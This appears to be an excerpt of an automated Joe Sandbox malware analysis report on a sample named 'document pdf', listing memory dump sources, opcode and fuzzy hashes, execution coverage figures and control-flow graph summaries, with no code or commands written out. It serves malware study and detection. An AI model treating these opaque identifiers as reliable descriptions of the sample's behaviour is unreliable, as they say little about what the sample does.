                                                                                                                        • Opcode ID: 89f44fb4946bb2ac7609be9608a4f8c31382d655336fa23be496df4f613aa58b
                                                                                                                        • Instruction ID: 25ff2fd78ac94f7293669b9880bdaf502a376cddfb935bdd9e4fc0dfa60493e2
                                                                                                                        • Opcode Fuzzy Hash: 89f44fb4946bb2ac7609be9608a4f8c31382d655336fa23be496df4f613aa58b
                                                                                                                        • Instruction Fuzzy Hash: 662148B2100244DFDB25DF84D9C0B66FF65FB84324F20C1ACDD090B256C3B6E456CAA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272304406.000000000175D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0175D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_175d000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1e6bbe357af27f724f2af032bf80799aafaaafcc22e172d265085c0aff9a7dd2
                                                                                                                        • Instruction ID: a30e63f5efaf7d59b9baea542bf5bc962d945f63976b470ea14c0a412f4c1494
                                                                                                                        • Opcode Fuzzy Hash: 1e6bbe357af27f724f2af032bf80799aafaaafcc22e172d265085c0aff9a7dd2
                                                                                                                        • Instruction Fuzzy Hash: 5C2133B2500240EFDB65DF94D9C0B26FF61FB88318F30C1A9ED090B256C3B6D456CAA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272363985.000000000176D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0176D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_176d000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3a2db8afa69b80c77bbce0352f7b031a159ee69f38eb62b8c055aa4aa9af1c74
                                                                                                                        • Instruction ID: 08371468709eadc6c8b9a3b2fb48589a901a79b4d57976b92e618d3203eec5c2
                                                                                                                        • Opcode Fuzzy Hash: 3a2db8afa69b80c77bbce0352f7b031a159ee69f38eb62b8c055aa4aa9af1c74
                                                                                                                        • Instruction Fuzzy Hash: 0B2149B1618300EFDB25DF94D5C0B25FB69FB88324F24C5ADDD894B252C376D446CA61
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272363985.000000000176D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0176D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_176d000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 77ceb8f56de64780cce96c726ba7ae2ccac25cc1fbf275b8afe0e93302b48a97
                                                                                                                        • Instruction ID: 5e79f58f72814afa486d58b51a939e5b98d590c90420ac6ec381b31d3865ad45
                                                                                                                        • Opcode Fuzzy Hash: 77ceb8f56de64780cce96c726ba7ae2ccac25cc1fbf275b8afe0e93302b48a97
                                                                                                                        • Instruction Fuzzy Hash: 00213075204200EFCB24DF54D9C0B26FB69EB88314F20C5ADED8A0B252C37AC806CAA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272304406.000000000175D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0175D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_175d000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                        • Instruction ID: 8bb93990c2b4068f6d82434a8557cdabb3eb586997339e098c08e9ec9b7d3e3c
                                                                                                                        • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                        • Instruction Fuzzy Hash: 0211CD76404280CFCB12CF54D5C0B16BF62FB84218F3486A9DC090B256C33AD45ACBA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272304406.000000000175D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0175D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_175d000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                        • Instruction ID: d39b9226bc732028c6e79a329857fca6e226d8f17990a1dfcdb22e14cbb86f7a
                                                                                                                        • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                        • Instruction Fuzzy Hash: 5411CDB6404280CFDB16CF44D5C0B56BF62FB84224F24C2A9DC090A256C37AE456CBA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272363985.000000000176D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0176D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_176d000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                        • Instruction ID: b4b27167bccded74aeee1a172591cc0eddcc63bfd032425d5fc537f1212253cd
                                                                                                                        • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                        • Instruction Fuzzy Hash: AC11BE75604284CFCB12CF54D5C4B15FB61FB88314F24C6A9DC494B656C33AD40ACB61
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272363985.000000000176D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0176D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_176d000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                        • Instruction ID: 7a6f7c80d7264ef3a58393fb69a55cb5e09eeafcd6a630936958758638abeb49
                                                                                                                        • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                        • Instruction Fuzzy Hash: 5D11BE75608280DFCB12CF54C5C0B15FB61FB84224F28C6A9DC494B656C33AD44ACB51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275364495.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5710000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ae56e4fce5512cbb4fba160850534010cd425912b8adedc19d2e39bc5d1d305c
                                                                                                                        • Instruction ID: c1b3fada21465b5452db9d12c2cf98ed92f1dd056654fe5d5b63ecaa3f1522ce
                                                                                                                        • Opcode Fuzzy Hash: ae56e4fce5512cbb4fba160850534010cd425912b8adedc19d2e39bc5d1d305c
                                                                                                                        • Instruction Fuzzy Hash: 311275F04037458EE726EF66ED4C1893BB1B746318F90420AD2656F2E9DBBC154ACF84
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275577156.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5800000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3b494ac1522e5acebc38fd00c610fd4c58a9ebfdbc48b0463028c504f2701300
                                                                                                                        • Instruction ID: 47cbfecbecda556c785be24cf5be789e36aa3e7cc2dabb55ac45db56596f795a
                                                                                                                        • Opcode Fuzzy Hash: 3b494ac1522e5acebc38fd00c610fd4c58a9ebfdbc48b0463028c504f2701300
                                                                                                                        • Instruction Fuzzy Hash: CFD1C33182075BCACB11EB65D994A99F771FFA5300F20C79AE50A77210EFB06AC5CB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275577156.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5800000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
• Opcode ID: a3d383a24d57842abebbe0fafeffddcd98743c3ff53a0846debad27e8d43398d
• Instruction ID: 76cfce01726786ea0ab91a71294cf5be00b0d47bed5163981e1af14e08d6a583
• Opcode Fuzzy Hash: a3d383a24d57842abebbe0fafeffddcd98743c3ff53a0846debad27e8d43398d
• Instruction Fuzzy Hash: 91D1C33182075BCACB11EB65D994A99F771FFA5300F20C79AE50A77210EFB06AC5CB91
Memory Dump Source
• Source File: 00000000.00000002.2272667102.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3060000_document pdf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 27f74e2372469be995e8063c812a6cd540a9073e2e0f241e02fcbfe14f7c4768
• Instruction ID: 2c63e6383fe8daa80c21d3ce832e8137866ad32684917c2dfc5ec33f1167dacd
• Opcode Fuzzy Hash: 27f74e2372469be995e8063c812a6cd540a9073e2e0f241e02fcbfe14f7c4768
• Instruction Fuzzy Hash: 6CA16B36A0130A8FCF05DFB4D9405DEBBB2FF84300B15856AE801AF269DB75E955CB80
Memory Dump Source
• Source File: 00000000.00000002.2275364495.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5710000_document pdf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b121ed57cea4494bca7c39ab26d6d88db2cb1d9021690b45d435ca6d8fe8d13c
• Instruction ID: 550dda1dbfe80abbae24d236a95534aafc0f50d806bd1e12e3518b031409dc34
• Opcode Fuzzy Hash: b121ed57cea4494bca7c39ab26d6d88db2cb1d9021690b45d435ca6d8fe8d13c
• Instruction Fuzzy Hash: AAC1F8F08037458FD726EF66EC481897BB1BB86314F51430AD2616B2E9DBBC158ACF84

Execution Graph

Execution Coverage: 16.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 26.5%
Total number of Nodes: 34
Total number of Limit Nodes: 6

Control-flow Graph
Memory Dump Source
• Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2ee623a4bb2d4c80720d8ab550a512c3c3b4f36cbeb49638cbf841ee4f6ca95f
• Instruction ID: b0ac7767a59025f45ddd9c232cd7ad2e30026042a8d62ed11daa01df65111c88
• Opcode Fuzzy Hash: 2ee623a4bb2d4c80720d8ab550a512c3c3b4f36cbeb49638cbf841ee4f6ca95f
• Instruction Fuzzy Hash: F3F1F674D01218CFEB54DFA9D884B9DFBB6BF88304F1482A9D808AB355DB719986CF50

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
Similarity
• API ID:
• String ID: (
• API String ID: 0-3887548279
• Opcode ID: 410f4eb65012483ca3e166dd983e2df7f74bdd43df1d154bc30eb60f45af6874
• Instruction ID: 155ec86eaa201f02600667621cb44da6b6071df205d7146975bd49f96cf407fe
• Opcode Fuzzy Hash: 410f4eb65012483ca3e166dd983e2df7f74bdd43df1d154bc30eb60f45af6874
• Instruction Fuzzy Hash: 16A10775E44258DFDB14DFAAD884ADDBBF2BF89310F14806AD408AB361DB309886DF50
Memory Dump Source
• Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0695867480a99527af66ada38ae0090b39a3f2a9e5ee60b3d3d9802df8097022
• Instruction ID: 44a1217fcc15093307e3dc214ab28d72aa9cc41e8ff9cdd8da80ee0cdfa8b765
• Opcode Fuzzy Hash: 0695867480a99527af66ada38ae0090b39a3f2a9e5ee60b3d3d9802df8097022
• Instruction Fuzzy Hash: CF829A71A01209CFCB15CFA8C984AEEBBF2BF88310F158569E4059B2A5D735ED81DB52

Control-flow Graph
Memory Dump Source
• Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1523eca40363a7213da589f040d4cb79a054224c45f029e3791d3de1fa8e82f5
• Instruction ID: 9aed80a6c25ec46d58a074714153bbc45546d78f1f050acd85c09cbb2eea91da
• Opcode Fuzzy Hash: 1523eca40363a7213da589f040d4cb79a054224c45f029e3791d3de1fa8e82f5
• Instruction Fuzzy Hash: F872B174E012698FDB64DF69C980BEDBBB6BB49300F1481E9D809A7355DB349E82CF50
Memory Dump Source
• Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 38aea9da09dfb4ba623713ac0460184db10e23bf8b410b266845399371ace52c
• Instruction ID: 28a4210f9d2cf6f1dd773d6c9cb4e3a53aef707937fce4c5505220998be645fb
• Opcode Fuzzy Hash: 38aea9da09dfb4ba623713ac0460184db10e23bf8b410b266845399371ace52c
• Instruction Fuzzy Hash: 79127D70B002199FDB14DF69C894BAEBBF6BF88310F208569E445EB395DB349D81DB90

Control-flow Graph
Memory Dump Source
• Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ee0108a9546e6280a17be40909f93d0ff01fce98eb00d58eadd2fab5930bba20
• Instruction ID: 3261ca3e19ded6f49d1699e79e16119de51c81a5fa19b34fb43960d1dfbd0a7c
• Opcode Fuzzy Hash: ee0108a9546e6280a17be40909f93d0ff01fce98eb00d58eadd2fab5930bba20
• Instruction Fuzzy Hash: E6027070A08359DFCB15DFA8C884AEEBBF2BF48310F158065E859A7261D735ED81EB50

Control-flow Graph
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ff1c47580729c0d7eb250924aa8b8901056482df6019ec1fc0d71f2f09e91a27
                                                                                                                        • Instruction ID: 69bc89662595bc6a9f34bdefe5dedeeedb1a1c889487032a10cb7e1af4cd8d37
                                                                                                                        • Opcode Fuzzy Hash: ff1c47580729c0d7eb250924aa8b8901056482df6019ec1fc0d71f2f09e91a27
                                                                                                                        • Instruction Fuzzy Hash: 4CF17774F05249DFCB08DFB6D8946AEBBB2FFC8300B14856AE406AB354DB359842DB51

                                                                                                                        Control-flow Graph
                                                                                                                        • (rendered graph; only the block layout survives as text) Function entry 6692968, basic blocks 6692968 through 6692da4. The call site at 6692a39 was observed resolving to three different targets (6692dc8, 669310e, 6692dc2) and the call site at 6692a50 to another three (6699548, 6699328, 669992c).
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 09592ba6f4233d4e81da0fbb440d71652f31c6c063838bb1dab3e96883c8bb80
                                                                                                                        • Instruction ID: 246c68901c145b7f78d71851d5658e8a40d70d18ee4f90c2506d1d1f40456ebc
                                                                                                                        • Opcode Fuzzy Hash: 09592ba6f4233d4e81da0fbb440d71652f31c6c063838bb1dab3e96883c8bb80
                                                                                                                        • Instruction Fuzzy Hash: EFC1D178E01218CFDB54DFA5C994B9DBBB2FF89300F1081A9D809AB365DB359A85CF10
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d2f74c4f2ae3a3b5617537abd724e1ec58bd9408d7542b2df26efc442febda30
                                                                                                                        • Instruction ID: 81569ad8a75029851ec9d559dcf7f21d5784861d77f604e30a54c0d5eb50bce5
                                                                                                                        • Opcode Fuzzy Hash: d2f74c4f2ae3a3b5617537abd724e1ec58bd9408d7542b2df26efc442febda30
                                                                                                                        • Instruction Fuzzy Hash: A7A1F574D00218CFEB14DFA9C95879DBBB5FF88304F209269E408A73A1DB759985CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0e15c3a35ca09e6e2d3c1644e1fb317e3547287d973deb176113c4702621276e
                                                                                                                        • Instruction ID: 44eebbfecedbe91048f676c91825a8059310c0f3a8a6edf044364c87250c4139
                                                                                                                        • Opcode Fuzzy Hash: 0e15c3a35ca09e6e2d3c1644e1fb317e3547287d973deb176113c4702621276e
                                                                                                                        • Instruction Fuzzy Hash: 81A1F474D002088FEB14DFA9C994BDDBBB5FF89304F209269E408A73A1DB759985CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e2c2c7261f3f3491b5f89d5d5dea95161b2329723c4ad6c48d3e56f08fe9f689
                                                                                                                        • Instruction ID: 3eee2d8efc3f452b7ea61972d1bf6091d0281d5fd2767fc3e8439ef51f53f723
                                                                                                                        • Opcode Fuzzy Hash: e2c2c7261f3f3491b5f89d5d5dea95161b2329723c4ad6c48d3e56f08fe9f689
                                                                                                                        • Instruction Fuzzy Hash: 0D91E174D00218CFEB50DFA8C988B9DBBB5EF49310F20925AE409B73A1DB759985CF64
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 87f47a04ff775fe0711d3c459308b98ba650bc2d0ebd08104badccaae3493796
                                                                                                                        • Instruction ID: 08b6f6f034a70857c2a655be5a6640086b1cb99d10a9aa489d4d1ac5e8f23604
                                                                                                                        • Opcode Fuzzy Hash: 87f47a04ff775fe0711d3c459308b98ba650bc2d0ebd08104badccaae3493796
                                                                                                                        • Instruction Fuzzy Hash: 0791D374E00258CFDB14DFAAD884BDDBBF2BF88310F14916AD409AB265DB709985DF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 37b62db07baae362f501d6ee2624888104c17d1ac4034ae2a788cad9706f4505
                                                                                                                        • Instruction ID: c1cc53d253cbef91b34bde1af14e5f3cb3d9f86962c92e61d2fc601de7f76cc3
                                                                                                                        • Opcode Fuzzy Hash: 37b62db07baae362f501d6ee2624888104c17d1ac4034ae2a788cad9706f4505
                                                                                                                        • Instruction Fuzzy Hash: 6891D374E00258CFDB14DFAAD894A9DBBF2FF89310F14906AE409AB265DB309985DF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5d6deef9a70ba232715b414ed4fb263f441d45d8e2d9a4a9fd6a5517d6bb7367
                                                                                                                        • Instruction ID: 1fe5ff86e916b5e080d2ec2f5523a16064fbfcb4426f14546d3fdf7e183d88e0
                                                                                                                        • Opcode Fuzzy Hash: 5d6deef9a70ba232715b414ed4fb263f441d45d8e2d9a4a9fd6a5517d6bb7367
                                                                                                                        • Instruction Fuzzy Hash: 2281B274E00258CFDB18DFAAD894B9DBBF2BF88310F148069E419AB365DB709985DF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 893442e2ade269e76014166f9517b883e09c8f4572ca53bfa6458f39e4298ed5
                                                                                                                        • Instruction ID: 08cdbbfca371941b585d900cc8a343ced64b4993d3716b51a05df255a9fb14e2
                                                                                                                        • Opcode Fuzzy Hash: 893442e2ade269e76014166f9517b883e09c8f4572ca53bfa6458f39e4298ed5
                                                                                                                        • Instruction Fuzzy Hash: 1A81C274E40258CFDB14DFAAD884B9DBBF2BF89310F148069E419AB365DB309986DF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c1bd40aa06c9addd610f7bc935504d5ec6e272979272fb48dca8963fe6d8e458
                                                                                                                        • Instruction ID: 757c4ba970c8f3bd8840c9eb8c094886a05753676e21cacc40e9c1514217f272
                                                                                                                        • Opcode Fuzzy Hash: c1bd40aa06c9addd610f7bc935504d5ec6e272979272fb48dca8963fe6d8e458
                                                                                                                        • Instruction Fuzzy Hash: 4681B274E00258CFDB14DFAAD894B9DBBF2BF88310F148069E419AB365DB709985DF90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1366c46d1b4c9529c009dcca795a4e0643122a7f8bdb82e462742099c3d7984c
                                                                                                                        • Instruction ID: d7759434f8e56973ea71584cee8176864c33174a96d4d5862463b31f63f71a79
                                                                                                                        • Opcode Fuzzy Hash: 1366c46d1b4c9529c009dcca795a4e0643122a7f8bdb82e462742099c3d7984c
                                                                                                                        • Instruction Fuzzy Hash: 9F81B474E00258DFEB14DFAAD884ADDBBF2BF88310F148069E409AB365DB309985DF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 57935999f1c062348a0b70cdd522dbaca03bf7cf57b3488046857f2f60b4690f
                                                                                                                        • Instruction ID: 927b269063bae55a6b15ba5e96bec6ae61202ffc6c744da3ccefb659ed6f3733
                                                                                                                        • Opcode Fuzzy Hash: 57935999f1c062348a0b70cdd522dbaca03bf7cf57b3488046857f2f60b4690f
                                                                                                                        • Instruction Fuzzy Hash: A981B374E00218CFDB14DFAAD984B9DBBF2BF88310F14906AD419AB365DB709981DF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9bf4fb502750c90b261b6fa581001fdbe5c5df29d8fb584c5fccfef6798f5885
                                                                                                                        • Instruction ID: 62a304d54b705dca78030ff34d671606c1f47cafa4b9cd22bbc4f495600edf30
                                                                                                                        • Opcode Fuzzy Hash: 9bf4fb502750c90b261b6fa581001fdbe5c5df29d8fb584c5fccfef6798f5885
                                                                                                                        • Instruction Fuzzy Hash: E0519574E01208DFEB18DFBAD894A9DBBB2FF88300F249029E815AB365DB745941CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dc78006bd71453bd0f6d2d07261389a5b0178c1c5bf1f67ed630ebd400eb93c2
                                                                                                                        • Instruction ID: ccde81f48ab8760f8e62af10e2fff7a0e95806567f427d7718f3f05ffc2817bb
                                                                                                                        • Opcode Fuzzy Hash: dc78006bd71453bd0f6d2d07261389a5b0178c1c5bf1f67ed630ebd400eb93c2
                                                                                                                        • Instruction Fuzzy Hash: 4C51A774E01208DFDB18DFBAD894A9DBBB2FF88300F249129E815AB365DB345842CF14

                                                                                                                        Control-flow Graph
                                                                                                                        • (rendered graph; only the block layout survives as text) Function entry 669992c, basic blocks 66997e3 through 6699b90. The only API reference is LdrInitializeThunk in the block at 6699a69-6699a7f; the block at 6699970-66999d1 calls 6699328.
                                                                                                                        APIs
                                                                                                                        • LdrInitializeThunk.NTDLL(00000000), ref: 06699A6E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
